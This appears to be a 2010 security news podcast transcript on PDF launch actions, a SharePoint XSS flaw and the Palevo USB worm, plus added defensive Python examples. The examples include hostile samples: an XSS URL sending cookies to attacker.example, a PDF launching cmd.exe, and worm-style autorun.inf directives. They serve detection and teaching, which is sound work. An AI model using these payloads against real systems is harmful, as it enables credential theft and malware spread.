Hello and welcome to the CERTStation Podcast for the 18th week of 2010. I am Jay Johnson and these are the headlines:
A jailbreak for the latest iPhone, iPad, and iPod Touch firmware has been released (pause)
Foxit Reader adds new security features to compete against Adobe's Acrobat Reader while
Microsoft's SharePoint bug exposes credentials and sensitive data (pause)
New P2P worm targets USB drives and a young audience, and finally
A security loophole in Facebook exposes private chats
And now for this week's newswire details
Hackers have once again wrested a measure of control from Apple's iron-fisted grasp of iPads and newer iPhones with the release of jailbreaking software that
allows hundreds of unapproved apps to be installed on the devices. The package, called Spirit, was released over the weekend for devices running firmware
versions 3.1.2, 3.1.3, and 3.2, which until now weren't easily freed from Steve Jobs' Howard-Hughesian control. The software allows users to customize
homescreen images, tether the devices to a PC so they can be used as a modem and do other things that Apple considers verboten. It also allows users to
install third-party apps from unapproved repositories such as Cydia and RockYourPhone. Spirit works only on iPhones that have been activated and are already
running an unmodified version of recent firmware. Devices that have been jailbroken by another program should be restored to 3.1.2, but users should ensure
SHSH blobs have been backed up, the authors stress. It provides no support for unlocking carriers, so users will still be stuck with their current mobile
provider after running the software.
(pause)
Version 3.3 of Foxit Reader contains a feature called Trust Manager which allows configuring the Reader so that it no longer executes scripts and programs
embedded in a PDF document. A similar feature has been available in Adobe Reader for some time. By incorporating this functionality, the Foxit developers
have responded to the still smoldering problem with the PDF specification's /launch function. The "Launch Actions/Launch File" function allows scripts or EXE
files embedded in PDFs to run. Although, since version 3.2.1.0401, Foxit has issued a dialogue message asking users to confirm the execution of such embedded
code, this dialogue can be formed in such a way that users have no idea they may be allowing malware to infect their systems. If "Enable Safe Reading Mode"
is activated, Foxit Reader won't even execute the code when a user disregards the alert and opens a script. The new option is activated by default during
installation. Adobe Reader handles this feature the opposite way: Only disabling the "Allow opening non-PDF file attachments with external applications"
feature, which is enabled by default, makes Adobe Reader immune. Only recently, anti-virus vendors reported that criminals have attempted to use PDF
documents to infect Windows PCs with ZeuS bots and worms. Therefore, users are urgently advised to check the configuration of their PDF Reader.
(pause)
Microsoft says it's investigating a security flaw in older versions of its SharePoint Server product that an independent researcher says can easily expose
sensitive data and user authentication credentials. The XSS, or cross-site scripting, vulnerability has been confirmed in SharePoint Server 2007 and is
likely also present in earlier versions of the content management system software, an advisory from High-Tech Bridge warned. It allows adversaries to inject
malicious JavaScript into the application by appending commands to the address of the targeted system. Successful exploitation of this vulnerability could
result in a compromise of the application, theft of cookie-based authentication credentials, or disclosure or modification of sensitive data. XSS bugs are by
far the most common form of vulnerability plaguing the web. Web masters and software makers often downplay them as insignificant, because the severity of
many of them is minimal. But as breaches like the one experienced by the heavily fortified Apache Foundation demonstrate, they have the potential to serve as
the chink that compromises an otherwise secure defense.
(pause)
A crafty new P2P worm appears to be spreading quickly among users of a range of popular file-sharing programs. So far the countries affected by the worm
variant BitDefender calls Palevo.DP (Romania, Mongolia and Indonesia) suggest that the worm is being driven by factors specific to those countries. However,
the file-sharing and IM services affected, said to include LimeWire, Ares, BearShare, iMesh, Shareaza, Kazaa, DC++, and eMule, are widely used around the
world by a mainly young audience, so the warning for users outside these countries is clear. The worm lures victims using a link embedded in a spam IM
message, which leads to what appears to be an image file but is actually the malicious payload. From that point on, the malware burrows into the host by
installing a number of files that compromise the Windows XP firewall. Two elements make Palevo.DP interesting. First, it copies itself to network shares from
the infected PC as well as USB sticks or other external drives. Any unprotected system with the Windows AutoRun feature turned on - basically almost every
PC - will find itself infected as those drives are moved from PC to PC. The second feature is its targeting of P2P services by adding code to shared program
files. The combination of removable media and P2P gives the worm a two-pronged attack-and-spread strategy which allows it to target home systems which are
then used to launch attacks on better-defended business PCs from inside the network perimeter. "This Palevo offensive is highly aggressive, and during the very
beginning of the outbreak we have witnessed rates of infection which easily exceeded 500 percent per hour," says BitDefender senior researcher Catalin Cosoi.
(pause)
Facebook engineers on Wednesday disabled the site's live chat function after people outside the company discovered a bug that allowed users to eavesdrop on
their friends' conversations. The site - whose founder insists "people have really gotten comfortable sharing more information" with world+dog - also had to
take emergency action to correct a separate hole that allowed users to see their friends' pending friend requests. Ironically, the gaffes were the result of
a new "preview my profile" service Facebook added late last month in an effort to give users more control over their privacy settings. Facebook said they had
persisted for a limited period of time, but wasn't any more specific. In a statement issued a few hours after the bug was reported by TechCrunch, Facebook
said it temporarily suspended the chat function while it patched the information leak. With that work completed, it said it expected to turn chat back on
"shortly."
If you enjoyed this podcast why not visit CERTStation.com and check out our free Internet Security Dashboard. In the meantime this is your host Jay Johnson wishing you a safe and secure week.
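Editor's note on the Foxit item: the "Launch File" action it describes is an ordinary PDF action dictionary (/S /Launch with an /F target and optional /P parameters), so a document can be checked for it before it is ever opened in a Reader. The script below is an added example, not part of the podcast or of Foxit's or Adobe's software; the three PDFs in it are constructed here (the /Launch one merely names cmd.exe, it is not malware), and the #xx name-escape trick it normalises is a known way of hiding the action name from a plain substring search.

```python
"""Flag /Launch actions in PDF files, the 'Launch File' feature the Foxit
item describes. Added example; the sample documents are constructed here."""
import re

# Constructed: a minimal PDF whose /OpenAction launches cmd.exe with a
# parameter string, i.e. the pattern the podcast item warns about.
LAUNCH_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
4 0 obj << /Type /Action /S /Launch /Win << /F (cmd.exe) /P (/c calc.exe) >> >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Constructed: same skeleton, but the open action is a harmless URI link.
BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
4 0 obj << /Type /Action /S /URI /URI (https://example.org/) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Constructed: the action name hidden with a #xx hex escape, which PDF name
# syntax allows and which defeats a plain substring search for "/Launch".
OBFUSCATED_PDF = LAUNCH_PDF.replace(b"/Launch", b"/L#61unch")

NAME_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")
LAUNCH_ACTION = re.compile(rb"/S\s*/Launch(?![A-Za-z0-9])")
# Literal-string operands: /F (target) and /P (parameters). A ')' preceded by
# a backslash is an escaped character, not the end of the string.
FILE_OPERAND = re.compile(rb"/F\s*\((.*?)(?<!\\)\)", re.S)
PARAM_OPERAND = re.compile(rb"/P\s*\((.*?)(?<!\\)\)", re.S)


def normalize_names(data: bytes) -> bytes:
    """Undo #xx escapes in PDF names so /L#61unch reads as /Launch."""
    return NAME_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def scan_pdf(data: bytes) -> dict:
    """Return every /Launch action found, with its target and parameters, plus
    whether the file has an /OpenAction at all (an action that fires on open
    rather than on a click is the more dangerous combination)."""
    data = normalize_names(data)
    actions = []
    for hit in LAUNCH_ACTION.finditer(data):
        # Bound the operand search to the object holding the action dictionary.
        start = max(data.rfind(b"obj", 0, hit.start()), 0)
        end = data.find(b"endobj", hit.end())
        body = data[start:end if end >= 0 else len(data)]
        target = FILE_OPERAND.search(body)
        params = PARAM_OPERAND.search(body)
        actions.append({
            "file": target.group(1).decode("latin-1") if target else None,
            "params": params.group(1).decode("latin-1") if params else None,
        })
    return {"launch_actions": actions, "has_open_action": b"/OpenAction" in data}


if __name__ == "__main__":
    for label, doc in (("launch", LAUNCH_PDF), ("benign", BENIGN_PDF),
                       ("obfuscated", OBFUSCATED_PDF)):
        print(label, scan_pdf(doc))
```

The scan is byte-level, so it will miss an action dictionary that sits inside a compressed object stream; for files that use those, inflate the streams first or use a PDF-aware triage tool such as pdfid. Whatever the scanner says, the Reader setting the item talks about (Foxit's Safe Reading Mode on, Adobe's "Allow opening non-PDF file attachments with external applications" off) is the control that actually stops the launch.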
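Editor's note on the SharePoint item: "injecting JavaScript by appending commands to the address" is a reflected cross-site scripting bug, and the mechanism is simplest to see with the vulnerable and the hardened render side by side. The code below is an added example and not SharePoint code or the High-Tech Bridge proof of concept; the search page, the q parameter and both hostnames are hypothetical (the advisory's real parameter is not given in the item), and the attack URL is constructed here.

```python
"""Reflected XSS via a URL parameter, vulnerable and hardened side by side.
Added example; the page, parameter and hostnames are hypothetical."""
from html import escape
from urllib.parse import parse_qs, urlsplit

# Constructed attack URL: the injected script ships the victim's cookies to an
# attacker-controlled host. search.aspx and 'q' are assumptions, not the
# parameter named in the real SharePoint advisory.
PAYLOAD_URL = (
    "https://portal.example/search.aspx?q="
    "<script>new Image().src='https://attacker.example/?c='%2Bdocument.cookie</script>"
)


def query_param(url: str, name: str) -> str:
    """Return the first value of a query parameter, URL-decoded ('' if absent)."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_results_vulnerable(url: str) -> str:
    """Echoes the search term straight into the markup: the browser executes
    whatever <script> the attacker put in the address bar."""
    term = query_param(url, "q")
    return f"<h1>Results for {term}</h1>"


def render_results_fixed(url: str) -> str:
    """Same page with the term HTML-escaped for the element-content context,
    so the payload is displayed as text instead of being parsed as markup."""
    term = query_param(url, "q")
    return f"<h1>Results for {escape(term, quote=True)}</h1>"


def session_cookie_header(name: str, value: str) -> str:
    """Defence in depth for the 'theft of cookie-based credentials' outcome:
    HttpOnly keeps document.cookie from reading the session cookie even if an
    XSS slips through; Secure and SameSite limit where it is sent."""
    return f"Set-Cookie: {name}={value}; Path=/; Secure; HttpOnly; SameSite=Lax"


def reflects_markup(rendered: str) -> bool:
    """Oracle used by the demo: does a raw <script> tag survive rendering?"""
    return "<script>" in rendered.lower()


if __name__ == "__main__":
    print(render_results_vulnerable(PAYLOAD_URL))
    print(render_results_fixed(PAYLOAD_URL))
    print(session_cookie_header("SessionId", "example"))
```

Escaping is context-specific: html.escape is right for text between tags and for quoted attribute values, but a value dropped into a script block, a URL or a CSS property needs that context's own encoding, which is where "minor" XSS bugs of the kind the item describes usually come from.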
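Editor's note on the Palevo item: the removable-drive spread it describes relies on Windows AutoRun reading an autorun.inf from the stick, and the directives in that file are what decide whether anything runs. The checker below is an added example, not BitDefender's analysis or a sample from the worm; both autorun.inf files in it are constructed, with the worm-style one using the well-known trick of an "action" line that mimics Explorer's own "Open folder to view files" entry.

```python
"""Inspect an autorun.inf for directives that make Windows AutoRun launch a
program, the propagation path the Palevo item describes. Added example; the
two files below are constructed, not samples from the worm."""
import re

# Constructed: the shape a worm-dropped autorun.inf typically takes. The
# 'action' text and stock Explorer icon make the AutoPlay prompt look like
# the normal "Open folder" choice.
WORM_AUTORUN = """[autorun]
open=RECYCLER\\setup.exe
icon=%SystemRoot%\\system32\\SHELL32.dll,4
action=Open folder to view files
shell\\open\\command=RECYCLER\\setup.exe
shell\\explore\\command=RECYCLER\\setup.exe
shellexecute=RECYCLER\\setup.exe
"""

# Constructed: an autorun.inf that only sets a label and icon, which is what
# a legitimately branded USB stick usually ships.
BENIGN_AUTORUN = """[AutoRun]
label=Vendor Drive
icon=vendor.ico
"""

# Keys that cause code to run, directly or as a verb bound to double-click.
LAUNCH_KEYS = re.compile(r"^(open|shellexecute|shell\\[^\\=]+\\command)$", re.I)


def parse_autorun(text: str) -> dict:
    """Return the key/value pairs of the [autorun] section, keys lower-cased.
    Hand-rolled rather than configparser: the section name is matched
    case-insensitively and keys contain backslashes."""
    entries = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def assess_autorun(text: str) -> dict:
    """Flag every directive that would execute a file, and note whether the
    prompt text is disguised as the normal Explorer choice."""
    entries = parse_autorun(text)
    launches = {k: v for k, v in entries.items() if LAUNCH_KEYS.match(k)}
    disguised = "folder" in entries.get("action", "").lower()
    return {
        "launch_directives": launches,
        "disguised_prompt": disguised,
        "suspicious": bool(launches),
    }


if __name__ == "__main__":
    print(assess_autorun(WORM_AUTORUN))
    print(assess_autorun(BENIGN_AUTORUN))
```

Inspecting the file is a triage aid; the fix on the host side is to stop honouring autorun.inf on removable media at all, which on the Windows XP machines the item mentions is done with the NoDriveTypeAutoRun policy value (0xFF under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer disables AutoRun for every drive type).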